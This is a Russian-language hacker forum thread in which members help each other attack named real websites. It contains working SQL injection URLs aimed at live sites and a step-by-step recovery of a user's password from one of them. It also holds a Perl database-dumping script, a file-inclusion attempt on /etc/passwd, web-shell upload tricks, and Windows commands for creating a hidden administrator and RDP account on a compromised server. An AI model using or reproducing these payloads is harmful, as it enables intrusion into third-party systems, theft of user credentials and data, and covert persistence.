BrainDeaD said:
ок. попробую.
а что на счёт бенчмарка с переменными? типа

Code:
concat(@i:=0x00,@o:=0x0d0a,benchmark(123,@o:=CONCA T(@o,0x0d0a,(SELECT+concat+(table_schema,0x2E,@i:= table_name)+FROM+information_schema.tables+WHERE+t able_name>@i+order+by table_name+LIMIT+1))),@o)

никак нельзя в блайнд так засунуть, чтоб он всё в ошибке выводил?


Все равно вывести все таблицы за один запрос в ошибке не получиться, так как, метод floor rand - имеет ограничение в 64 символа, а метод основанный на выборке записи по средствам XPath - 31 символ.

Привет, как узнать полный путь у www папке на сайте http://www.mgccc.edu/ ? При наличии LOAD_FILE, есть ли какие-то брутфорсные варианты подбора папки? Например, софт, который пробует стандартные структуры папок?

Возможно ли залить шелл, если есть инъекция, кавычки НЕ экранируются, известен путь к сайту, но на сайте нету папок, в которые муксул может писать? В конфиге обнаружен логин-пароль юзера дб (удаленно не подключается), вроде как админки нету на сайте. Сайт тот же, что и в предыдущем посте: http://www.mgccc.edu/ На том же серваке лежат http://www.mississippibowl.com, http://www.mississippibowl.org, http://www.msbowl.com, http://www.mgcccbulldogs.com, http://www.saccr.org, и их файлы принадлежат одному юзеру. Если кто-то найдет и ткнет в форму уплоада носом, будет просто отлично

Помогите, пожалуйста, найти админку в http://www.followyourheart.com/

rooopster said:
Помогите, пожалуйста, найти админку в http://www.followyourheart.com/



http://followyourheart.com/news/wp-login.php

Word press

BrainDeaD said:
есть запрос

Code:
+and+(select+1+from+(select+count(0),concat((selec t+table_name+from+information_schema.tables+limit+ 206,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

как видим, в базе более двухсот таблиц. пребирать лимит руками не кошерно.
есть ли возможность вывести весь список таблиц в блайнд-скуле?




Code:
#!/usr/bin/perl -w
# target
use LWP::UserAgent;
$ua = LWP::UserAgent->new;

my $proxy="http://xx.xxx.xxx.xxx:port"; # proxy
$ua->proxy(['http','https'],$proxy);

my $i=0;
while(1)
{
my $req = HTTP::Request->new(GET => "http://[host][path]/?variable=(select+count(*)+from+(select+1+union+se lect+2+union+select+3)x+group+by+concat((SELECT+SC HEMA_NAME+FROM+information_schema.SCHEMATA+limit+$ i,1),floor(rand(0)*2)))--+");
my $res = $ua->request($req);

if ($res->as_string =~ /Duplicate entry(.+)for/)
{
open(FILE,'>>results.txt');
print "print $i: $1\n";
print FILE "$1\n";
close(FILE);
$i++;
}
else {last;}
}

ну под себя не сложно подмутить.

все таки хотел узнать такие домены как: http://site.com.su/ трудно расковырять? и это выбирается в целях безопасности?

скачал JBroFuzz для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось ))))))

B1t.exe said:
все таки хотел узнать такие домены как:
http://site.com.su/
трудно расковырять? и это выбирается в целях безопасности?
скачал
JBroFuzz
для фаззинга, но не знаю по каким параметрам сканировать. запутил с SQL инекциями, но ясный пень, что ничего не нашлось
))))))


Почитай вот это: /thread228319.html

Reflected XSS и magic_quotes_gpc

Есть пассивная XSS вида


Code:
?file=

Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида


Code:

Redwood, а можешь залить куда-нибудь MaxPatrol, а то все ссылки битые

есть веб шелл на сервере с


Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?

Нашёл SQLInj:


Code:
http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,ver sion(),user(),database()),4,5,6,7,8,9,10,11,12,13, 14,15



Code:
version() 5.0.67-log
user() strob_admin@127.0.0.1
database() strob_product

Как теперь можно залить шелл(не через админку)?

Заранее спасибо, в этой теме 0 почти.

intNet, вот здесь посмотри:

https://rdot.org/forum/showthread.php?t=352

123


brutos said:
intNet
, вот здесь посмотри:
https://rdot.org/forum/showthread.php?t=352


мдя, brutos ну и где там все условия чтоб лить через иньецию?

нет 2-order inj, mg=on, прав нет у юзверя.

мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь?


Shadrin said:
есть веб шелл на сервере с

Code:
Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open

можно ли запустить бекконект с таким набором?


perl-скрипт


Shadrin said:
Strilo4ka
как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?


/showthread.php?t=198119


brutos
Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.


ок


p0deje said:
Есть пассивная XSS вида

Code:
?file=

Судя по всему, magic_quotes_gpc включена, поэтому двойные и одинарные кавычки экранируются. Как можно обойти это, при этом не используя конструкции вида

Code:




тут (http://forum.xaknet.ru/showthread.php?p=96723)

тут (http://forum.xakep.ru/m_1298634/tm.htm)

пашкеле медаль. )

Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.

Strilo4kaкак я запущу перл скрипт если у меня фунции запуска в пхп отрублены?

как я запущу перл скрипт если у меня фунции запуска в пхп отрублены?


залить perl скрипт (а лучше perl шел), попробовать запустить его через web.

также нужно попробовать создать .htaccess

Options +ExecCGI

AddHandler cgi-script pl

у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.

Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе)

И если только брутить то подскажите скрипт или программу для mssql

Redwood said:
Попробуй MaxPatrol, он фаззит mod_rewrite.
И в довесок почитай вот это: /thread228319.html


очень проблематично найти MaxPatrol.

может посоветуйте альтернативу ?

Acunetix Web Vulnerability Scanner 6 - пойдет?

Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..

Redwood said:
http://forum.web-defence.ru/showpost.php?p=2923&postcount=6


Спасибо за прогу.

выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит.

снял лог, а там только заголовки на всю страницу:


Code:
GET / HTTP/1.1
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host:site.aa.su

Скажу еще, что сайт попасть можно только лишь после авторизации.

http://ru.akella.com/Game.aspx?id=1%27

че дальше, кто подскажет?

не имел никогда дело с aspx-движками.

Всем привет!

Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php)

Надеюсь мой ход мысли понятен!?

...хотя думается мне, ответ будет отрицательным.

DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции?

IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...

Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345

Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?

molotovkeyt said:
http://ru.akella.com/Game.aspx?id=1%27
че дальше, кто подскажет?
не имел никогда дело с aspx-движками.


Тут нет уязвимости.

blackhat said:
Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?


значит он там уже есть,лить в другую папку или .phtml .php3 это поробуй

Shadrin никакого эффекта =(

http://www.xvideo.ru/catalog.php?product=588+order+by+1--

помогите раскрутить инъекцию

на union select никакой реакции

Axel_Ustus:

http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,vers ion(),user(),database())),rAnD(0)|0)+hAvInG+miN(0) */

Axel_Ustus:

Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:

1) При запросе "order by 2" нам возвращается sql запрос:


Code:
select categories_id from t_products_to_categories where product_id = 589 order by 2--

И мы видим, что запрашивается одно поле

2) Закроем запрос


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1

3) Попробуем написать union select после закрытия:


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union select

Мы видим ошибку, следовательно union select блочится

4)


Code:
http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select

Ошибки нет

5)


Code:
http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1

И запрос, который нам вернулся:


Code:
select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2

Из этого следует, что тут несколько запросов, и union работать не будет)

спасибо kamaz)

мне была интересна именно причина

1


Code:
http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3 a,id,password,login%29%20from%20a_admins%20limit%2 00,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/

http://www.xvideo.ru/admin/login.php?action=send

там такое:


064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdasd'' and banned = 0' at line 1
select id, password from a_admins where login = 'asdasd'
' and banned = 0


если подмутить типо такого в логин, то должно пустить поидеи:


' or 1=1 limit 0,1[комент|продлить]


зы итак крутить через ошибку можно

может кто-нибудь помочь мне с этим?

http://www.menupix.com/hoboken/restaurants.php?id=305209

Я не могу извлечь базу данных

gabarea said:
может кто-нибудь помочь мне с этим?
http://www.menupix.com/hoboken/restaurants.php?id=305209
Я не могу извлечь базу данных




Code:
http://www.menupix.com/hoboken/restaurants.php?id=305209%20and%20%20%28/**/select%20count%28*%29%20from%20%28/**/select%201%20union%20/**/select%202/**/union/**/select%203%29x%20group%20by%20concat%28database%28 %29,floor%28rand%280%29*2%29%29%29



Duplicate entry 'mxst1k_mxdb1' for key 1

что это значит? Я не могу извлечь данные?

gabarea:

information_schema.tables фильтруется, поэтому делаем так:


http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+count(*)+from+information_schema.columns),ran d(0)|0)+having+min(0)


"Duplicate entry '6471' for key 1" - 647 колонок. Далее прогоняй вот так:


http://www.menupix.com/hoboken/restaurants.php?id=305209+or+1+group+by+concat((SE LECT+concat_ws(0x3a,table_name,column_name)+from+i nformation_schema.columns+limit+0,1),rand(0)|0)+ha ving+min(0)


меняя "limit+0,1" - "limit+647,1". Так сможешь вывести все имена колонок и таблиц, в которых они находятся.

Дальше, надеюсь, сам разберешься.

кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)

и каким то чудом информация доступна о софте:

в служебном инфе есть линк на __http://drupal.org/node/258

отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.

а внизу мелким штифтом:

The mysql error was: Too many connections.

а тут и тип БД.

P.S. DDoS или что.. ?

теперь все это дело надо как небудь совместить..

если там mod_rewrite, то смогу что то ковырять в БД ? или это бесполезно?

B1t.exe said:
кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)
и каким то чудом информация доступна о софте:
в служебном инфе есть линк на __http://drupal.org/node/258
отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.
а внизу мелким штифтом:
The mysql error was: Too many connections.
а тут и тип БД.
P.S. DDoS или что.. ?
теперь все это дело надо как небудь совместить..
если там
mod_rewrite
, то смогу что то ковырять в БД ? или это бесполезно?


Если тебе известен двиг, скачай исходники и посмотри структуру запросов.

ну это логично и я понимаю насчет уязвимостей, но там насчет запросов SQL получиться, если ничего не отображаеться на адресном сторке?

mod_rewrite

такая проблема:

http://www.soulmades.com/index.php?method=pubchatform&roomid=1%20union%20select%201,id,password,4,5%20fr om%20soul_souluser%20where+id=1101181/*

вывод идет сюда:


Code:
Private chat between lily_michelle and


1101181 - id

lily_michelle - name

539818 - password

вывод возможен только числовых значений

непонятки с паролем, то ли он выводится неполным, то ли еще что-то. давайте вместе помозгуем.

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/*

=>

длина пароля 16

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/*

=>

первые 6 символов '539818'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/*

=>

ascii код 7-го символа 99 => 'c'

дальше можно самостоятельно

... добалено позже ...

не, решил дальше поизвращаться

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/*

=>

ascii коды 10,9,8 символа = 544955 => '716'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/*

=>

8-13 символы = '716512'

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/*

=>

ascii коды 16,15,14 символа = 57049102 => 'f19'

password = '539818c716512f19'

проверяем

http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/*

=>

1, т.е. пароль верный

кста, вариант с if(password=0x35333938313863373136353132663139,1,8 ) почему-то не прокатил. кто знает почему такое может быть ?

Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?

rooopster said:
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?


http://forum.xakepok.net/showthread.php?t=7222

Существует такой запрос

INSERT table_names SET val1=firstname, val2=lastname

Значение val2 могу привести к любому виду.

Задача - добавить запись в table_admin или сделать вывод из table_users.

Возможно ли как-нибудь выкрутиться?

*сделать insert into outfile - не могу, нет прав

**обнаружить select, который бы принимал val2 пока не удалось

Сорри, если это боян. Буду признателен за любую помощь.

asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.


я совсем не понял что надо делать, но если ты это хочечь то..

INSERT INTO table_users (val1, val2) values ('blabla','blabla');

выборка

вывод - Select val1,val2 from table_users limit 1;

а INSERT INTO outfile в первые слышу

asia555 said:
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?


Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так:

В поле lastname пишем запрос вида


Code:
',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska

Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)

Сорри, что криво объяснил.

OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2.

user_id - это primary key, автоинкримент.

Я обращаюсь к скрипту, в котором есть такой запрос:

INSERT table_names SET user_id=1 val1=firstname, val2=lastname

с val2 я могу делать все что угодно.

Я хочу либо слить таблицу table_users либо добавить запись в table_admin.

Случай 1. Я могу привести запрос к виду:

INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1)

После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается.


Konqi said:
а INSERT INTO outfile в первые слышу


Здесь я конечно ерунду написал.

Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать

INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =(

Сегодня попробовал на локалхосте:

SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается

INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =(

Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так:

INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET )

user_id передаю заведомо дублирующийся.

Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это?

Что еще можно попробовать сделать в первом и втором случае?

Помогите раскрутить ету скулю.


Code:
http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12, 13+from+admin--+

Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста..

moodoone, вот такого плана инъекция:


http://polvent.com/index.php?action=catalog&brand=-2+UNION+ALL+SELECT+1,2,3,4,5,(SELECT+cast(group_co ncat(table_name)+as+char)+FROM+information_schema. tables),7,8,9,10,11,12,13--


Дальше сам знаешь.

Спасибо! А где можна почитать про такого вида инъекции?

Не знаю) Я просто прогнал ссылку через прогу "Havij", она спокойно все обработала. Перехватил запрос, ну и поигрался с ним. Ничего особенного)

Вообще, там даже вот так все работает:


http://polvent.com/index.php?action=catalog&brand=-2+union+ALL+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13+FROM+information_schema.tabl es--


Фильтры стоят на select и from.

Code:
http://www.koruna.ua/index.php?id=2'

А тут можеш мне помочь? Сайт уязвим вобше?

____

Сам вроде разобрался) Спасибо еще раз)

http://powell.citymedia.ca/deal_framed.php?deal_id=64202

gabarea said:
http://powell.citymedia.ca/deal_framed.php?deal_id=64202


http://powell.citymedia.ca/categorydetails.php?cat_id=-186'+union+select+1,@@version_compile_os,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25,26,27,28,29,30+--+

что делать если union и select в связке фильтруются

http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53965

gabarea said:
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53965


а не пойти бы вам на все 3 буквы? тут что для вас....конвеер по раскрутке скулей для тебя?

Kappa_87

http://www.xxx.ru/showtopic.php?num=-123 or 1 /*%00*/ group by concat(left((select count(*) from INFORMATION_SCHEMA.TABLES),64),rand(0)|0) having min(0)--+

=>

244

в принципе с /*%00*/ и обыкновенный union select скорее всего прокатит (лень и неинтересно уже дальше копать) - у них там некая хрень, похоже самописная, которая все параметры к сайту при любом обращении фильтрует по regexp на что-то в роде select.+from и union.+select c безразличеем к регистру.

кста, запрос и через post проходит

Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..

ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на *.htm , *.aspx или .html. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.

В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.

просто я обычно тренировался на т.п. запросах, как это: /*.php?id=***

а тут другая ситуация уже..

B1t.exe said:
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на
*.htm
,
*.aspx
или
.html
. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
просто я обычно тренировался на т.п. запросах, как это:
/*.php?id=***
а тут другая ситуация уже..


mod_rewrite тебе о чем нибудь говорит?

Gorev

ну да, недавно было тема об этом mod_rewrite , сказали, что тлько фаззингом можно раскрывать пути вроде.

а как насчет этих:


все линки кончаются на *.htm , *.aspx или .html.


это уж точно не mod_rewrite !

B1t.exe
Постоянный
Регистрация: 06.11.2006


ты аккаунт купил или реально с 2006 года в очаде ? =\

голый html сайт собрался инъектировать ? 0_о

а вот тебе насчет aspx пример


http://news.uzex.com/gazeta/index.aspx?id=133%20or%20133=(SELECT+TOP+1+COLUMN_ NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_N AME='Login'+AND+COLUMN_NAME+NOT+IN+('Author','Auth orEmail','BirCena','CH','CH_location','CurrentCats ','CurrentName','DateDisplay','DateIzd','DateLogon ','DatePost','DatePosted','EN','EN_location','Emai l','F1','F2','F3','F4','F5','F6','F7','F8','F9','F 10','F11','F12','F13','F14','F15','FileName_','Ful lContent','Headline','Host','IP','ImageName_','IsA ctive','LoginName_','Message','MiniContent','Name' ,'NameLogin','Number_','Password','PathName_','Pos ition','RU','RU_location','RozCena','Sticky','Type ','URL','UZ','UZ_location','UserLevel','adrr'))--

B1t.exe said:
это уж точно не mod_rewrite !


Почему ты так уверен, что это точно не Mod_Rewrite?

URL можно преобразовать, как угодно и расширение, там может быть любое.

Вот пример:


HTML:
http://www.realcoding.net/news/v-sql-server-katmai-ne-budet-ozhidaemykh-funktsii-winfs.html

Ты думаешь сайт написан на статическом html, а статьи обновляются вручную без базы данных?

Это ничто иное, как php + mysql.

Самый простой и не "хакерский" способ, смотрим заголовки сниффера:


Code:
Server[Apache/2.0.63 (CentOS)]
X-Powered-By[PHP/5.2.9]

Ну и исходный код статьи:


Code:
http://www.realcoding.net/redir.php?url=http://www.thevista.ru

Redwood

хмм.. вот как значит.. все же Mod_Rewrite так активно исползуется в многих сайтах ?

а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ? ((

shell_c0de

не надо гонять тут на меня. стариков хоть уважать надо.

не зная SQL - не значит, что акк купил.

я тут с времени империализма.

а то, то я написал по поводу html, то точно знаю, что там есть SQL база и наверно PHP тоже.

вот смотри пост redwood и поймешь, что на самом деле сайт то не голый...

B1t.exe said:
Redwood
хмм.. вот как значит.. все же
Mod_Rewrite
так активно исползуется в многих сайтах ?
а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ?
((



www.site.com/news=123(SQL injection).html

примерно так

П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал

2B1t.exe ну хз как бэ сорри если что =\

кстати юзай еще прогу от Seravin'a BSQLi_v.1.2 он тоже прочекает все твои ссылки на скули

при переходе в какую-нибудь диру пишет:

You don't have permission to access /admin on this server.

чем спастись от этого?

Gorev


www.site.com/news=123(SQL injection).html


типа www.site.com/news=123&photo=2+UNION+ALL+SELECT+1,2,3,4,5.....html

типа того?


П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал


Ну и не надо обсирать.

shell_c0de

читал в топике. тип пишет, что helper лучше вроде. ну написал в теме. ТС если обновит и с виде выложит - сакчаю и буду юзать.

Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?

NorB said:
Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?


попробуй как слепую крути, вариантов много что там фильтруется...

jecka3000 said:
при переходе в какую-нибудь диру пишет:
You don't have permission to access /admin on this server.
чем спастись от этого?


скорее всего фильтрация по айпи... так что не судьба..если конечно админ сайта не твой друг...

Есть обычная blind sql inj, фильтруется LIMIT? Как можно раскрутить без LIMIT'a?

hacker-nubik

http://raz0r.name/obzory/group_concat/

и особенно, ближе к самому концу, коммент от iHornet

еще сюда: https://rdot.org/forum/showthread.php?t=60 глянь

а как это к слепой прикрутить включай мозг

помогите заинклудить

http://luvaccessories.com/shopping.php?category_name=Romantic_Gifts&page=../../../../etc/pssswd%00

как слить базу данных мускул? есть доступ к фтп.

http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--

выдает ошибку хотя количество полей подобрано верно

обьясните почему и как выкрутиться

Nightmarе said:
Залить шелл, лучше WSO, и через него сдампить.


я пробовал неполучилось

пишет error can't open file

а теперь в предачу еще пишет

You were denied access because:

Access denied by access control list.

но это изза прокси...

может посоветуете какойнибудь провереный дампер

Axel_Ustus said:
http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--
выдает ошибку хотя количество полей подобрано верно
обьясните почему и как выкрутиться


BLIND

как узнать список таблиц из определенной бд?

я пробовал чтото вроде этого

http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000

невыйшло..

547 said:
как узнать список таблиц из определенной бд?
я пробовал чтото вроде этого
http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_conc at%28table_name%29%29%29,7,8,9,10+from+information _schema.schemata+where+schema_name=0x00000000
невыйшло..


from+information_schema.tables+where+table_schema= 0x000

547

1) кавычки хексить/чарить не надо;

2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME

или Mysql->columns_priv-> Table_name если возможно.

SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')

как раскрутить?

Strilo4ka said:

Code:
http://www.skunk2.com/news2.php?news_id=43%20or%20%28select%20count%28*% 29%20from%20%28select%201%20union%20select%202%20u nion%20select%203%29x%20group%20by%20concat%28vers ion%28%29,floor%28rand%280%29*2%29%29%29--

4.1.221


эфект тот же....

если с

/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...

roddik said:
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...


Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..

Strilo4ka said:
интересно
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#


Это всё уже попробовал,не катит. Пишет

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1

Darth Padla said:
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1


ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..

А почему в личку?мне не жалко,просто из принципа раскрутить хочется.

view-source:http://znakomye.ru/news.php?дальше скуля

Народ, такой вопрос.

Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.

Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?

Darth Padla said:
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.
view-source:http://znakomye.ru/news.php?
дальше скуля


Блин проковырялся , но ничё не вышло....

GroM88 said:
Народ, такой вопрос.
Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?


учётка для дедика:

net user user password /add

net localgroup Administrators user /add

net localgroup "Remote Desktop Users" user /add

net accounts /maxpwage:unlimited

скрыть учетку:

Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в

HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->WindowsNT->CurrentVersion->Winlogon->SpecialAccounts->UserList

и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD)

Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.

ну и патч для мультиюзерности ставим.

ответ 3x'e'orcist

так это вроде как палевно,юзер может заметить как ты у него в реестре копаешся

предлагаю сразу ключик добавить с cmd:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" \v ИМЯ УЧЁТКИ \t REG_DWORD \d "00000000" \f

Вы походу неправельно меня поняли. Я имел ввиду не как создать учетку на дедике.

А как создать учетку через залитый шелл на дедик)

GroM88 said:
Вы походу неправельно меня поняли. Я имел ввиду не как создать учетку на дедике.
А как создать учетку через залитый шелл на дедик)


Нет тебе правильно сказали. Напиши рег файл, запихай в автозагрузку и ребуть. Ну или если сможешь выполнить его, то выполняй. Тока через реестр можно добавить.

ммм...

я создал .bat файл с содержанием

net user логин пасс /add

net localgroup Administrators user /add

net localgroup "Remote Desktop Users" user /add

net accounts /maxpwage:unlimited

подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?

GroM88 said:
ммм...
я создал .bat файл с содержанием
net user логин пасс /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?


зачем тебе бат файл? зачем так извращатся? дали же тебе решение чуть выше...

GroM88 said:
ммм...
я создал .bat файл с содержанием
net user логин пасс /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?


запусти его сам и все можеш батник удалить,главное не забудь как Strlilo4ka->exor(ist,добавить ключик в реестр...

